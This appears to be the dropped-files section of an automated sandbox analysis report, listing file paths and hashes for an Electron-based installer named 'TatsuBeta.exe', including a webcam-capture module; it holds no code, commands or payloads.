SHA512 9813239cb162cec24cb81cffdae2df06889782813d917da186ae40df6dae64477467e4b32ead2d714bc1de671538d4c1fde990d83d3ee69e0932f17226687a78

C:\Users\Admin\AppData\Local\Temp\nsh669A.tmp\7z-out\locales\ro.pak

MD5 24b01a438a3ab9699d4ca97c081b5e82
SHA1 0d0b082544d23425a74199fb0a6c11192f0bdf7d
SHA256 38290b1c9712296d82ea1681ef95544a1eef4872289134b11e50af735e6deaca
SHA512 43199772312156f4633c4202499cde8f808e5e632c2013ec1129acee01a3f184e86df2616626173178efe04b6f0773ad9a0e8b8cc6a735d23d68dcfe9dfd945b

C:\Users\Admin\AppData\Local\Temp\nsh669A.tmp\7z-out\locales\pt-PT.pak

MD5 ecd84b296d3bb312ee18e21017311986
SHA1 f5625523f85c10723750834a54ff59a2dd886fb3
SHA256 fcfaa9c44c445876c286388b6a1abc1df949f3dda3d64fb57d6e0d54a05cdb94
SHA512 e95b74238220024cdd0bd1c0f18beadbbe427d76cd8d6b32d5700adcd34ffb068ad0bf75404921485c8077f395f5111cd40d5dfe2b5b8f34c62e6fc80b507456

C:\Users\Admin\AppData\Local\Temp\nsh669A.tmp\7z-out\locales\pt-BR.pak

MD5 88ad860c73676ffb4025b5c691f29942
SHA1 3c5e5b999ea7153ccdd1b4cc7b6162de3456b558
SHA256 25f0bb0b0230d99a9064d52668636f3be85903bf27a68124d79a2fe93c30fe0e
SHA512 41589bb9ab1b8307f62ceb4e6493d7903731a3e63807e0044379c4acdda881c21839234f5f1b8ad1af732bfee6231c0556ce92e582505379ed949980185bb750

C:\Users\Admin\AppData\Local\Temp\nsh669A.tmp\7z-out\locales\pl.pak

MD5 644c0ace25d6e532b56510a736c6bc2c
SHA1 1bd0fec952107b493da04c46423da634ff3e1504
SHA256 2ff9e382a31783285b7d85676e629e2f6db26bb9536ed17b7fbe5ac61a895ec7
SHA512 9a1f1e884c2f214b8b0c63543809ddd4ba0fd533f1d8434e926051f3db434f60cc4df2462c2a43254b2a9685b3869eef49463c212892e417c82c3a7b497e3559

C:\Users\Admin\AppData\Local\Temp\nsh669A.tmp\7z-out\locales\nl.pak

MD5 cf6b1cbfd669e9461553974ba37a475e
SHA1 b33867e9bc7fd88ca98a76dc4bd756bcf18887aa
SHA256 9a83ad866ad7fd9d65ecbc1e95c276cfce27e8257c76a16950fd14971e66b864
SHA512 e463029bb37f6bb3ff5cb6281f64291ada1b785fa33137e7aedfc7b5e409e99c75a91e7cf9b6c0933e970f70c14861190de66fc5d68925b687a6f5da02e21077

C:\Users\Admin\AppData\Local\Temp\nsh669A.tmp\7z-out\locales\nb.pak

MD5 b61e42f66d581b6a8929cdf5fb10662e
SHA1 6f06fa9ee092fbcb61bbd668734fb3b92cfb549a
SHA256 1b17dcde8fc7308d926fbe0faa83dfc9ffe2efc5715e9afd557dde839ad98b7e
SHA512 79b82346c3f133a6ba44148a8432ad4e08e2805187b759509cb386bc800fd20215592c07d953812c243f0b1d5e1354245f2cb42b2b3eb6c87280bcb4008dbe97

C:\Users\Admin\AppData\Local\Temp\nsh669A.tmp\7z-out\locales\ms.pak

MD5 6cfadaa784e687e6dadbcd80e631bc9b
SHA1 481acb75f525055bf4e45ecabe0eadcb9c492106
SHA256 fb5e125dd5e1f21e8df229d22cb3d1f9078bd79bbddca352899248f2a8b21b71
SHA512 0d7da5a90fe9372bc704ab8cdc8cbfb14d323cafdef856987e2d9e34d980196c03985e25099f5d1bcb10c97f040f4766e2c3713718649bb3f43914a77f0dbb39

C:\Users\Admin\AppData\Local\Temp\nsh669A.tmp\7z-out\locales\mr.pak

MD5 f22c99fe6a838e333e8ee06a4d01296b
SHA1 c3542ea8dd45a2b387dd02fa5687948f135e10f2
SHA256 b03a3042f907aed13253ae8083d08f5fad59ff438d024b097276856e72526911
SHA512 882022c2cb985d85f96d52c9bcfeeb089d6ff30e66187ccf424ef622092b9d359a51bdef1fb6ac3b9d3409aa79d37ca737ba7f3ed8b9cdaabfe04d90a7c8bc15

C:\Users\Admin\AppData\Local\Temp\nsh669A.tmp\7z-out\locales\ml.pak

MD5 04b2540c25990a5e0a9b227dcce6ae0d
SHA1 4f8ccd154f54dfb083d4d1a3ed0994842c8ab13e
SHA256 556165b8b54c6e21bc66d12b3f5be393136714467c427f7114f314d18ad3c661
SHA512 4cab47e42e8f5d4a83851871f97f3e1360c993ba530dbb4b4b736350779784bd83189e1195d3480ce87298bb8f9b7f249fefa7764d850e5b0002895609626785

C:\Users\Admin\AppData\Local\Temp\nsh669A.tmp\7z-out\locales\lv.pak

MD5 264c6e20b3088ceb4dae5773cef0cb55
SHA1 fb6ff83ff14df008092bc3ee73bda7491e8e090e
SHA256 a676a781c1a587eadf23e5c69bc52f2d352346a70bc53ca908450362535eefda
SHA512 01e949f92e1e8599c581929a601d39640abaf1d907ce10102e591c3d490dd3874c679c75bb51308ead55a3bd0c6dcd1b8d4b2daf98ce1cf1c6bab42946e8b1e8

C:\Users\Admin\AppData\Local\Temp\nsh669A.tmp\7z-out\locales\ko.pak

MD5 d6e2c18c9eabba59b50d147d942125ea
SHA1 0918879203c2050b4f9f449f5616e430897ba0b9
SHA256 f3581cea2e5b022b121010ffc5d67f86f717e3a0c0402abd81e24c87fd135b76
SHA512 f605f7b9893166778af156f9eb76eaa1209e7432450899540cd462ce0ffa69caf6f570b910cdd6d7bef54354379e9892a658e711baa93241da33755c107da859

C:\Users\Admin\AppData\Local\Temp\nsh669A.tmp\7z-out\locales\ja.pak

MD5 833e8c4aa70351b6be7bd403e4e9a0a7
SHA1 46ccdbdea35deec8ef13a5fc833776875fad187b
SHA256 74422db1a5f28522f9a8b31a3bee9a6df794b419bf723cb6a6c88e82eb72cec0
SHA512 e8e709612a5ea81d2822e0025b7306f38571f2cec2ca72ac5a8ab852a0e36a0f5bc7e00d0baf7ac7becc2c54dda3a17c52ec1cd67ce12b14d91b6ae0b726d556

C:\Users\Admin\AppData\Local\Temp\nsh669A.tmp\7z-out\locales\it.pak

MD5 5aa225aad4f9fe6d05ec24905a827d88
SHA1 f6d5ed337bd8e9cc3b962d3a498e3430fbf6de22
SHA256 96e02ab6937a1f1cb58762159761a737ce0e1dcd6a253554392baf4389326eab
SHA512 3fa928f19bdf65b8fbb274b478a801821b15c01224c113a8d7f6121a077b432c0cc84eefd9028a76adea9fa4bb65dcb868edfbd4368b1e4d477c49e187e4288a

C:\Users\Admin\AppData\Local\Temp\nsh669A.tmp\7z-out\locales\id.pak

MD5 e40cb2f3b4db379e4d187aeef0dfd300
SHA1 537b1ebc615c980c89bbe2b9e91a11199fa7d6a6
SHA256 3339ef011c9bb64868da94adb25f4490acbc7f893e4337dbfe2797754cd659f5
SHA512 b87464460077aa55feb92eca8ed23d9a61829378bae7890c8a95dac5fcd735b145d65661f27facfe2586fcaa169692b00d8ee8dd505dc44bff7f7fd090f3e96c

C:\Users\Admin\AppData\Local\Temp\nsh669A.tmp\7z-out\locales\hu.pak

MD5 71d42cb22d2d7a8b26c4514ab12df3aa
SHA1 cd0307503a7906f1742d1e98fc816959319c2171
SHA256 b51bcb888dbc27bab88a8c9d081df7496de8a9a5a4cd2cfe08abc154190e75e6
SHA512 29c67391bca706807be3a0cc79fe481f220e30263957a9c2485f0a4c498a5b250bdd83b5f4fad8d0b19c8a9a07d5650b5ebd5816b6aae311a1cde78a89303244

C:\Users\Admin\AppData\Local\Temp\nsh669A.tmp\7z-out\locales\hr.pak

MD5 6f92235e6ba003af925a2d6584afd27d
SHA1 3ceba61e9c2975466b6244188f5ea72aaf042fc7
SHA256 479dc4f75a889d45f62b4ddb6eb48f21c473e37875468c9c26d928a263e15840
SHA512 82f2642dff4400704c15c2fa02d0ec74ed3fe888dc835447c1afce7463dee8f480bb81be358c306e681625864a6d25e5cd6c96252b8a56e6fc62014b3aa4d26a

C:\Users\Admin\AppData\Local\Temp\nsh669A.tmp\7z-out\locales\sw.pak

MD5 99e385ebc1ef8d3daddb3a171fa79edf
SHA1 3164804dfe9d9b5e891abafe92e5ba67d2b5d4d1
SHA256 8ec45ac391a085d531fb21815086c2da4841aa016653cb4f8484cfc2615d6c01
SHA512 797c105fecef1e15870aa101e3fa1835d5a467a9059c03b3636c54934d1de263ab7f23599e21d9787cb3849c7cb7d29f5bdd8ae9ad10fda8015c1392462e94c0

C:\Users\Admin\AppData\Local\Temp\nsh669A.tmp\7z-out\locales\sv.pak

MD5 41e76f7775fc9a2d6e3c02c46e9b32f6
SHA1 088c15c74a68bee69682bf89c31055332b68c84a
SHA256 2533676479e9469ffcdaabcb47d3e39bebfe7ae2b80f70784e918a8827439e13
SHA512 6cde752d748c4772b533c8894f18134e5842113f8c7590b44a7dfa088aed65b232361fd16170df3b0d738066dbc3a769847adf4dd8ba42de63c9c2b33f9beb6b

C:\Users\Admin\AppData\Local\Temp\nsh669A.tmp\7z-out\locales\sr.pak

MD5 af7083f2a4bd95dcbe792efade352662
SHA1 dc69aa831836016f6e66c6079931503d534a7862
SHA256 e3b80d9fdd420a05d66cc12e685ac94500106dd51a555bbfa2d085094f81e8dd
SHA512 342400ba94f6cd08152f96aa2b905184fab429c38cedb4bcb4ac0c503169a9ecd47aef208b4d7ffae08b0c0afa7aa089347a20739379d05f3e4e111be842b8c4

C:\Users\Admin\AppData\Local\Temp\nsh669A.tmp\7z-out\locales\sl.pak

MD5 e015b6f5042be2dc96a4e23dcf035502
SHA1 7946509eed8db1e4c1f3da99ffe7155c86fdb4d6
SHA256 99536d1bc73eec81d5bebbff641ea195544ee5e3a41bb17ddcedf9cde9b141d4
SHA512 b2a2eaae93c506a053862bf1cde02eee53b3ea2e2fe4c964c51dbacb8b44de820a779311cfe01458e2f08f88bce1172e8c5e1e6d28cd3a355ff84baa00023b8f

C:\Users\Admin\AppData\Local\Temp\nsh669A.tmp\7z-out\locales\sk.pak

MD5 b35daa0bd9627ca88b413a5af7c6b4a4
SHA1 d5efdcbc7ca17de29f3075f6434f31ab2e895826
SHA256 f47bc1f7f5ab64681d0b152e1a019da60f0ef057ee8bf2ccede019dc4030c177
SHA512 48abb6ca2290820db2898b05820bb25e70fb1292c816eb0c8f17b3c5452de9fff7027d216d2bf413900f408f44ed4ac99151b28142a212c5cff8dfe229e87b9b

C:\Users\Admin\AppData\Local\Temp\nsh669A.tmp\7z-out\locales\vi.pak

MD5 69c8796439192577f48bd249175aaf37
SHA1 97c52088ca69dada593db0e42b2135d264646454
SHA256 d7fdb53592de803a5fbcd8561c4918f1562f92fc8a3fd0039a2a1a7b76a8ecc2
SHA512 65eb7cb15291474ec7f9354775e59bcf334c90ddf3498ebd184e4c47118308421b2405bfa679e4b3a70ed1790e167c109fc2c72e89c3e31b5378cae975424144

C:\Users\Admin\AppData\Local\Temp\nsh669A.tmp\7z-out\locales\uk.pak

MD5 d791b1ecf2931b2fb0c31aac170c7cdc
SHA1 02be115a9ff94fe5250651b6de4323eafc44fce1
SHA256 ffae6286d44c8e219ef90d411ad8746159a6ff8ea610e2a651147a3956696a22
SHA512 3a2edb8069e4a9734ce5e02b7c3de3c968c5bbc116f17f52f97e2bb2c78485c456c4f0cc952686c1aa17b7ee4d326a1dda698afafc63c79d842ca3905181a8da

C:\Users\Admin\AppData\Local\Temp\nsh669A.tmp\7z-out\locales\tr.pak

MD5 40491896ad21543f339467186c5efb40
SHA1 695dde7cc35056dcbf0a533aff8299d4c6b61bd8
SHA256 43e99e132acaba88971b81a43531845dc7fc3a1e0794c3373de7d9a50a5655aa
SHA512 18d5ee9914849462e0b1bafd1ca216b29d0795e282ae0bdb354b15caf5c18f37f44fbd6f626b2cbb095e3398a6496de72e5b0d15621433979b5a589e34fac818

C:\Users\Admin\AppData\Local\Temp\nsh669A.tmp\7z-out\locales\th.pak

MD5 43edd25f67ce6e6cea5373009ff0a1f8
SHA1 ed72ca6620cf23837e1334be50ccf616806bc5a2
SHA256 287897cf3df2db1cf59b872e6575ba8dfcaa0c1f68c17a9c91da6c4490adb8b0
SHA512 7160a72bd2e6b0ffa71e5d279995cc8be24a87cd9386eb29ab0eee79b8e607f5d824a11b6b4e3ef4c0f851a9d485a9642cb6adaa65c07933dca6e6f2c0052fc7

C:\Users\Admin\AppData\Local\Temp\nsh669A.tmp\7z-out\locales\te.pak

MD5 793a87d41cde6e6d1bb086284f69733b
SHA1 d887e3842b664f55b7308427aa6f5bf0b352d879
SHA256 5cdabd1ad41e8048f2cc6b1615e68b99159daa1aa6706b939447c1811bf0e255
SHA512 7c2e53baa387480eed45315bd9d53856ca46e5777ecdc9c29a0de7b0ad04beb6cbb8b5df0aa7c306395fda563037e06bea1ca70e433ce5a3ccc2ec184dfda972

C:\Users\Admin\AppData\Local\Temp\nsh669A.tmp\7z-out\locales\ta.pak

MD5 4a99278f9540f7e9bd28b8cd696e88cd
SHA1 b26ef40dc6e3d1bc23a57da9643b980f4e8fc710
SHA256 c17ff350cb6ba80a46f30f12178fae6f478d8a91026fe03d684725e224420307
SHA512 196708ae1f3fe81dd4e5b2b257655bbfe572671013932a52a5097a8ee377e450f9260fc2fe28ab9408b652aef037df361e89d3391c6cb189d2255d467583c1ea

C:\Users\Admin\AppData\Local\Temp\nsh669A.tmp\7z-out\locales\zh-TW.pak

MD5 c2c35fcedc3708b5bcadf36587393002
SHA1 31d72402cbd44ceb921cedd806259c2cd14e411f
SHA256 cfe4c2c5eb131fd92e0d11f912714c5a9a048833ef3ffbe32679b3d58da8f8ac
SHA512 9ba3ea2d569d1d3ef09e94d7e66f843c8804368c4d016b6289e7dba002f7d2d50884a76c93eef879d87abcf8b36dd3e682b7bd3a18b2b5a969256cef672abf01

C:\Users\Admin\AppData\Local\Temp\nsh669A.tmp\7z-out\locales\zh-CN.pak

MD5 098d656a4f4bd8240bed10e7678186c7
SHA1 0c19ab62b4262f1b51558e8aaa79e7741f73393a
SHA256 a55f568ad3a8854cec25699484f55024501c8a0967738ba694e073151e5981c7
SHA512 084538ce774233ca6d4393bb42239b0b85e11bd73dd19ba47e55796ca19848941b037510c0fca4ac08b4b2e0ccbc9b4ae72ef88a3e841738dd211961dc53c1e2

C:\Users\Admin\AppData\Local\Temp\nsh669A.tmp\7z-out\resources\elevate.exe

MD5 792b92c8ad13c46f27c7ced0810694df
SHA1 d8d449b92de20a57df722df46435ba4553ecc802
SHA256 9b1fbf0c11c520ae714af8aa9af12cfd48503eedecd7398d8992ee94d1b4dc37
SHA512 6c247254dc18ed81213a978cce2e321d6692848c64307097d2c43432a42f4f4f6d3cf22fb92610dfa8b7b16a5f1d94e9017cf64f88f2d08e79c0fe71a9121e40

C:\Users\Admin\AppData\Local\Temp\nsh669A.tmp\7z-out\resources\app.asar.unpacked\node_modules\take-cam\prey-webcam.exe

MD5 471b15abc9f2e98fb7ed7361d3f045eb
SHA1 95b5798d80a9410872f6ed485ae2b43ca3745540
SHA256 7c262639cb22348dfd627dc07c76e8748e5bcacde2dcf1614773ab174c831004
SHA512 5b3b59aa1dbaef31b0ff6ccde082d7c312e39e311a46fe20d590d5d7765f934d3b663da9609ff4fb7beba2e8fa85376cf74f14ae077f3c0b49189cc28c30163a

C:\Users\Admin\AppData\Local\Temp\nsh669A.tmp\7z-out\resources\app.asar.unpacked\node_modules\take-cam\package.json

MD5 067e233b0609d56ff4756bedd8c0efe0
SHA1 96419d05adc4b6674948b4ac14f8ab5bb3ce4380
SHA256 6bee642c1b5de99e4edba87ec3221c2ecd10b65e666b6f2bef64a745538ecf74
SHA512 94900f5ff762930b1b060ba4dd44d629d6c3e2dfc0dacb1a543f1ea5a3cd40e793acaff4abefbff588ceb422d65f8041ec190a2b56f7c303c3314eb16eca4159

C:\Users\Admin\AppData\Local\Temp\nsh669A.tmp\7z-out\resources\app.asar.unpacked\node_modules\take-cam\DirectShowLib-2005.dll

MD5 c20c205c6f8d70a5e1351a4041a3ec9f
SHA1 e1b2a763dd6c42439656e4e55aba0f3610ff3784
SHA256 bbcbb170242d9ff1b56680a80b1f8755df1135f9c714535ff3b3f575442f38dc
SHA512 dffd59d775dbb89cd886a2212fb9fe4cf0b2bdd7f2c00f8dc7c6b2287053b4971c8c6c033109ff1f90cdacea082e44d3c19fa76325d24976420c418218e701f1

C:\Users\Admin\AppData\Local\Temp\nsh669A.tmp\7z-out\resources\app.asar

MD5 c9a3586d0bd6dccdfcb8964f3e299c86
SHA1 d064c9088319ca7284416285b17f3c1889a4f13a
SHA256 15bea9fccb5745dc04e3c7e63cdf9d30adbe43ef0a66343068754d67d784bbec
SHA512 3a7803ac94f16e2628bc99c35b8eece5ce76d18e5cf76e3c7ab9eb832f93cbafe6d11223fb745f50e6702f2ffec552553beaf323d7912ffa03ced58ce7a188e7

C:\Users\Admin\AppData\Local\Temp\nsh669A.tmp\7z-out\swiftshader\libGLESv2.dll

MD5 983cc8e66fe31e3e7fdd08ede4c6f271
SHA1 471dbb77415dae32f0a880854463b7c6745eaab9
SHA256 f730e24644a0fba46e0123abd548f744d584d33db6a7e14caf2aa0e3f18bd9fb
SHA512 9fe848f542936ca9593270659fbb2c83dfda27c105500bd58e93bbdaef01182e8ba67e4a24f33b1c2d3c66449cda62bf59898e8278ab23f438306b027920fbff

C:\Users\Admin\AppData\Local\Temp\nsh669A.tmp\7z-out\swiftshader\libEGL.dll

MD5 864d7d009202a72845bcc95be7c75854
SHA1 7402c13cc011ae4a22b648e04e7b7a40aacd9228
SHA256 c6aa0cb88a9a643e460dd13070f8d543df5be7dc837713f3226f24a72793dd94
SHA512 2832ea2bd94a1710eec09c720898bd246a899150e2f8106013a7abcf69f5ef55b9161112c13c13b38fc5088625ca7be1c4968af52890c489a28581e21544e6ce

C:\Users\Admin\AppData\Local\Temp\nsh669A.tmp\7z-out\resources\app.asar.unpacked\node_modules\take-cam\snapshot.exe

MD5 16a12bdc986207390dd79d658a6b2263
SHA1 b4b41f62cbc1e1ede786c6e30e11df8e61750bad
SHA256 50a8dd2f292bea9190204a42de067a34d5cbbec53746d40fe5b067fc85190bac
SHA512 d20394028c5d3ca46bb4879cac40da07b7d857f9a4a834bb4db4bd047f1a3265a80e1f7528244da6ee97c2f3e0cb5b2e51bc88eeb382a027939c2188e66dcdd9

C:\Users\Admin\AppData\Local\Temp\nsh669A.tmp\StdUtils.dll

MD5 c6a6e03f77c313b267498515488c5740
SHA1 3d49fc2784b9450962ed6b82b46e9c3c957d7c15
SHA256 b72e9013a6204e9f01076dc38dabbf30870d44dfc66962adbf73619d4331601e
SHA512 9870c5879f7b72836805088079ad5bbafcb59fc3d9127f2160d4ec3d6e88d3cc8ebe5a9f5d20a4720fe6407c1336ef10f33b2b9621bc587e930d4cbacf337803

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\v8_context_snapshot.bin

MD5 133fd2944ddb828873ed7852e554e2f7
SHA1 94caa52e6fd4442591e62a1facdde80fafc870a0
SHA256 c350b9f0fbe47ad01cb66cc0ecd82f7fee975ae84adb3b61e8b707fbe9dc7e5a
SHA512 d4f3f95588adc75d957060f99c54fb8082ebedc1a1bded23e5ffdc50f9cdb1df5d8eec014d521e2d038d3f42ea20a04cd6cebce79e23415efcf8441e86c947a8

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\icudtl.dat

MD5 edbb13c737108da1fa035d68850bd411
SHA1 1dec03222c25ec60a432671ec607ca8f0f86d049
SHA256 7658395181bf58d1b7ff06ac620e7dd2e5121bf1f3dce268342bbea296dbad08
SHA512 66867269ff0dc764f73fdf667ec58b746f500d5dd3208f4e8815e684a1b09cc8a5d175ebca8404642893f5f99ff0327aeaa6069782b4da6beb3bbb46c2e90489

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\ffmpeg.dll

MD5 6970b63501b4990ef3b9a7bc9e0239e9
SHA1 280ebafc6db534643fe3382f334a7ee0120f6655
SHA256 05cf68585c4a08d78abedce8ac4c2b3fdf251633b2781b0bedb54840278f2a8d
SHA512 7c15743076f4e4bd09f3567ee146370ad06f8dbd3e2c1e2d2535a50af029ff9f5b4d7a470281ba6d6d570bfafbf55997da534ac7aed33269845e8c4b97137ad1

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\ffmpeg.dll

MD5 54eab9765a617e3292317a233716b14b
SHA1 1e874fb3a34cfc28c50555df058599c690fcc8f0
SHA256 a628325fd3c6058b1c62d25731db44cf2350bd8bb843c08fc7f12c8c22dcd139
SHA512 7e6e312ca96c39118a0e0be4874da40e56fdb87007667fe6b02ec9dee8f9ff0dc7e7e93906e2ca459a799c5d523c37d95e024b6660783905d10d5b4ee8c96dea

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe

MD5 b54d789237602b05fd25e4b6dfdeef00
SHA1 492e5a28cc1576ef4a246587c690fe0039a4d6b4
SHA256 ed763c38a390f68f79f268c06d1f26477053c2546b8362e02f68c8fba14351d5
SHA512 8cba5f4ef3aec60c013a1f6384216c7ef835323f68f86446fbf1c90d4f1303aabd96f82ae64afbda9b77bda06b416b5caa3c1f3235bcd4ebe3e95949508910bc

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\resources\app.asar

MD5 cb449e3dedc1e4729d7e7089068e8637
SHA1 7459f6dcf3f76ba523be4f803747474d88cefa64
SHA256 e4a04e8087403ac6f4c363469bce1044080b872f4d196609f996af24deab07ea
SHA512 2e8d756d007353b95c86d4840436b6fb3d3976d632da9ad73ce896d43a602a3d4c1c5672d8766d5928d1203c72ee35ac755bff29020fc5597b3de5516226db53

C:\Users\Admin\AppData\Local\Temp\8a37fbd9-0b4a-488f-97d8-fe5bb5289e92.tmp.node

MD5 a6569ecf86793dd5da441df497c3406d
SHA1 13b1f8777d688a01eba748e30f6d4aaf62a66ec9
SHA256 65624992a6b5de1835cebcc6a898edc02dc0944aa3ec758a57c3e22e7268505a
SHA512 44d04c9f69131aba61c755c6abd2b76f9d90d8374a5ef40f4c5b028c1d55074bc5058ee213f87c26e4820dea314d2143de622c17741d014dde4f404aa54f562d

C:\Users\Admin\AppData\Local\Temp\11280b26-4c11-42d1-b001-82fd0f510079.tmp.node

MD5 27301b2210979c2e7def147c8767be00
SHA1 f9a36d055876437671e5045b0d135ef2986d92d8
SHA256 10f5a8e9547f2c8c58e54b116f665865b0fe6ac9783adcf9bccd8b28b4fe568e
SHA512 60400b892c74115e5a598c131a9287b47c2525ffc2b2ee5872a6d3edba5c9891711c1f83f07ebda974ec3be790cf20fa91409e877bee8c781f7524e3c5d41fd5

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\resources.pak

MD5 6f4ec3fc0129c08fab19de4165707444
SHA1 fffc6e05243c2bd5e45de66c84eb7360545b76d2
SHA256 4ec7d1e3c23c0b95a8fc449b1f8fd4de3eca1c09c253888073b84a0909db157f
SHA512 ef607f141317ea44ac574584e38125f84b9e378c1ed540c0626fbb25fe21ad278d9750f8a3c8574922f107be5871b8e72366812e1937eee4ab4b20a8d9873d2f

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\locales\en-US.pak

MD5 e27a6d0f0f3eb0963f7959fcca6f716e
SHA1 9fc14897a88b74a53ffb7b608851358e55c32dd0
SHA256 6164ddc1bc8602dc31441654a7d6e75a9ce4e505902a0c1cd9a9f5a4503aae1b
SHA512 481a976acf697483217662419565057f74e3857c70c286aee9a54abb79c28e461a0d0daebb971c003ec1dbf58a86c29b241f8915c5558ce045e52499b113c83a

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\chrome_200_percent.pak

MD5 2ac3f6a83cb12c882b8a9ca2beb7bf4e
SHA1 c85ce1b86302bd93b201e5415e07c144015ce8ee
SHA256 bf79a8c4fcd2ab6a131dce86e34f9699acb6e32691535448b1b4ef1bc7ec3ab5
SHA512 e770ec8ca49a1cf33c03f80546dd671a72d752c0c4167b1b58238b47057f218c052ee0983331daa2785ad88cdb25443cd031fb8bf96a68bfe0981eca31a5c894

memory/4888-578-0x00007FFADEEA0000-0x00007FFADEEA1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\ffmpeg.dll

MD5 54dead2e813b6310aa5a8d39de3642e4
SHA1 e9941feebd01c8b96dc7f7b345bbb8f0106a6390
SHA256 85efafb5a991f99b20ccfa756dd5930454f2c7bc912b9f5c341f3cbdbcfe38d9
SHA512 a5db89296cf8fa6b950ff1dbc9b089a2c72a62c57586ff2c075617f9693e6a8b6e97871e997f2de0720bcc4a42e7de9658e04f84e4c646594a4f96eeba2e02f3

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe

MD5 1d561a323e82814dbb0f5d89b69bfbc0
SHA1 1e15568d2bd4175efa8be8bab1311651b4b2caec
SHA256 6e5993e63cadf1d6044f2b4352baa372b588983cf928a34f00e6d4779bd9a5e2
SHA512 20996c3574a31c48f27dfdfd049b0c8a24a306063af4074988fa0e0e653120c1b5b584afe443ce77f78750ae0343bd201da5810c1a3c7cc229ec5f8aac4ecb59

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\chrome_100_percent.pak

MD5 b2019cb477a6edf18a9d54a8ca573cd0
SHA1 6d4d4efe6f21902e2e00f6ca48170f23714c0cd6
SHA256 3ebbb95f749dcecd387d957ae59989b920e12ee0c99f45323d3a5b6509cc92de
SHA512 4cfe570723afccf277f2b95bf1caa5d8a5e556150a05576e7458e7997652f3236b91522680a202d01afb0ca4ebeb574d7698577d210a07f0370f4e2335935c8b

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\libEGL.dll

MD5 e26ff6f318133eb0f6f94786953dc963
SHA1 5e9e7dc6ba023bd42cac17fe91c6a24432d9b6c5
SHA256 4b51e1bc671bb9732df5e05afa9b622b20332c26d863617e8383d12d3df230ba
SHA512 3d839b863f2b8566832c7f12f0758f69af3c10ffc405ef5ccdf7807b8c27fe9b76d73c852975cf3e1b0daf381b45cd87c09cb5d98f5453649f872ce8642fe698

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\libegl.dll

MD5 a2f8733c7c9c1631d58ad485653c4713
SHA1 7322da0d2f20bd031f402b1ca3f6482f1f1bc344
SHA256 ca519d25fdf410d3117a1bb28fc52689392bfed896bf1d4915423681a1e3d2a3
SHA512 4956e50dc73bcf6c4c8fa463aeb05d66a0beb7ce6bb78b39f03802ceb680f5f22fe32a1b0cfd674ff8ad4cf672e77c8b31c522796956450f6302fc6801548183

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\libGLESv2.dll

MD5 f5174910047b05fa744f4196a490bbd8
SHA1 7a0d6475051a61ba3a2e49099627a21c69bc438f
SHA256 c7942f3e52fce842fdcad187f5d9447fa8adcdc95a06176c0a452271f1096f35
SHA512 cee4fcb8bc5919581c1fdc626b32fddeac80001ce5604f02cc9cb12d79721576623b08afb47b1ea6369766617c4b705312fe5c8334ffaf237ac4d14b52053bd3

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\libglesv2.dll

MD5 28697e5977431af26e5a7565ac0c00bb
SHA1 9bff4534902a08ef819b192d06984cb1fa4e08b1
SHA256 679d905977c40affdd1947a96ec5c53cb1e3da1d12328a8de3a323600df5a136
SHA512 fe9b8a2271b187f7aff7fdcc8129e3fa61f0d828f4cbaed295d0e2f14603f9289f7cd0824c7a19a9e27f89c7996e152b9ae3153e5fc52c1111104163154147eb

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\d3dcompiler_47.dll

MD5 e3a83bc53870039aa3b18ae41684bd04
SHA1 dab3f64a9f1795dc3f2f0f10b1f6cc067772793c
SHA256 65e75b3e2d698d205f67f1aa4d49218d0e313b437bbab13fd52b2355eb80fd7d
SHA512 92b7bc616f160d36409aa462225189dda48d6192256b3c716e5b355b05c355be66efe2013a1daa838babcef3c8f5bc9d4cfd01ffb6c3fe0cb1d234843a479ec2

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\D3DCompiler_47.dll

MD5 b2cc388f3aa71f9c3a9503348aeddfac
SHA1 4e413023ce9527819ca91eaec0ac92675d23f268
SHA256 432ef2ec690049327e4d985fd94628300a6c61b0769306524e925482f2ba8f1c
SHA512 7f4f4c1c9c826c076d69af71de7aaf536936256c4d9d5c62a74e0991b402ff34cefe786f6be17dbe5e1870842d41d1070fa42415cdec346aa564228447b99d50

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe

MD5 529be33164d77cdcd0f31c4bb83b4921
SHA1 f8b02ef5d90361e89e0ed82f09ad24b674ea2e19
SHA256 8cb18ac2f1c11b11fe2ede1e9c0723031fa3ddd632051683205d73751af23b88
SHA512 9d558c0e9fa7e4a1df3861f98c13647110ff0aa1e54547dd4ff5fb049a8aa303c9f19f301548e3727e7b4e33b18a9ac8e7929cffeba40c95794b06a7282bfa2c

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\ffmpeg.dll

MD5 91d1c852e8f4468825f6a7a85761938c
SHA1 88dabd22fe7ec5fc184f7b86b1c86803b0462d96
SHA256 a22868e14b1c1ed0b8122c6b46894d8b48d47c22818947354e56f4cad6ee0b11
